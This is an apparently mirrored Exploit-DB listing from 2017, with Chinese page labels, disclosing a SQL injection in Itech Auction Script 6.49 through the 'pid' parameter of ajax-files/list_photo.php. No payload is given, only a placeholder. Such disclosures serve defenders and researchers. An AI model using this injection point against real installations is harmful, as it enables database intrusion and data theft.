Itech Auction Script 6.49 – ‘pid’ SQL Injection

• Exploit Database
• 106 阅读

• 作者： Ihsan Sencan
  日期： 2017-02-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/41229/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  # # # # # # Exploit Title: Itech Auction Script v6.49 – 'pid' Parameter SQL Injection # Google Dork: N/A # Date: 02.02.2017 # Vendor Homepage: http://itechscripts.com/ # Software Buy: http://itechscripts.com/auction-script/ # Demo: http://auction.itechscripts.com/ # Version: 6.49 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/ajax-files/list_photo.php?pid=[SQL] # E.t.c. # # # # #